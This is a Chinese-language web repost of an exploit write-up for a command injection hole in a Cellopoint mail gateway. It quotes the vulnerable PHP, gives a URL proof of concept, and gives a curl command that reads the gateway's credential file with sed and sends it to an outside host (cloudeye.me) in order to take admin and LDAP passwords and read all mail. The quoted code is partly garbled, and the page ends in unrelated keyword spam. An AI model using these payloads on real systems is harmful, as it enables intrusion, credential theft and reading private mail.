千家信息网

cellopoint邮件网关任意命令执行漏洞方示例分析

发表于:2024-09-22 作者:千家信息网编辑
千家信息网最后更新 2024年09月22日,这篇文章将为大家详细讲解有关cellopoint邮件网关任意命令执行漏洞方示例分析,文章内容质量较高,因此小编分享给大家做个参考,希望大家阅读完这篇文章后对相关知识有一定的了解。zend 解密测试发现
千家信息网最后更新 2024年09月22日cellopoint邮件网关任意命令执行漏洞方示例分析

这篇文章将为大家详细讲解有关cellopoint邮件网关任意命令执行漏洞方示例分析,文章内容质量较高,因此小编分享给大家做个参考,希望大家阅读完这篇文章后对相关知识有一定的了解。

zend 解密

测试发现reporter目录下的gw_x_vrfy_n_test.php文件存在一处命令执行:

$email = $_GET["email"];$vrfy = $_GET["vrfy"];

$file = (isset($_GET["file"]) ? $_GET["file"] : $ini_default);

$debugFile = "/tmp/vrfy-test.err";$cmd = $GLOBALS["TopFileRoot"] . "smtpd/celloauth -v " . . " -n $vrfy -d 2> debugFile";

exec($cmd, $output, $ret);

$lines = @file($debugFile);

URL内构造POC:gw_x_vrfy_n_test.php?vrfy=;$cmd;

的方式可以利用该漏洞执行命令(nobody权限)。

排查发现/usr/local/mozart/smtpd/default.ini文件保存各项邮件管理员、ldap等账户密码信息。

构造以下sed命令(通过sed命令读取目标文件单行内容):

curl%20-k%20https://cloudeye.me/?info=$(sed%20-n%20§3§p%20/usr/local/mozart/smtpd/default.ini),

通过查阅远端服务器(例如cloudeye.me)的web日志信息,

回显获取到default.ini文件内容,得到邮件归档管理员admin的口令或者配置的ldap密码,访问 $ip/report/login.php 登陆查阅全部邮件内容。

关于cellopoint邮件网关任意命令执行漏洞方示例分析就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。

命令 邮件 内容 文件 漏洞 示例 网关 分析 信息 密码 文章 更多 知识 管理员 篇文章 管理 不错 口令 方式 日志 数据库的安全要保护哪些东西 数据库安全各自的含义是什么 生产安全数据库录入 数据库的安全性及管理 数据库安全策略包含哪些 海淀数据库安全审计系统 建立农村房屋安全信息数据库 易用的数据库客户端支持安全管理 连接数据库失败ssl安全错误 数据库的锁怎样保障安全 数据库的共享解决方案 android搜索外部数据库 数据库数据类型括号里面 车邦互联网大连科技有限公司 软件开发有哪些规范标准 防控网络安全的例子和损失 教学云管理服务器厂家 计算机网络安全防范书籍 五华区专业性软件开发报价表 服务器运维表情包 哪些学校招生网络安全研究生 软件开发能力的视频 和仁科技同济医院互联网 linux服务器工具 2000数据库怎么添加密码 云服务器存储和本地保险哪个好 我的世界基岩版创建服务器花钱吗 丹东振兴区网络安全应急指挥中心 数据库技术发展的几个重要方向 文件如何进入数据库 新员工培训软件开发中心 互联网科技对当今教育教学的影响 聊城有实力的联想服务器代理 网络安全海军刘毅 教资网址找不到服务器 can网络技术 比亚迪厂软件开发 携程 数据库 凶手 数据库资料是否有法律效力 北京紫博蓝网络技术...
0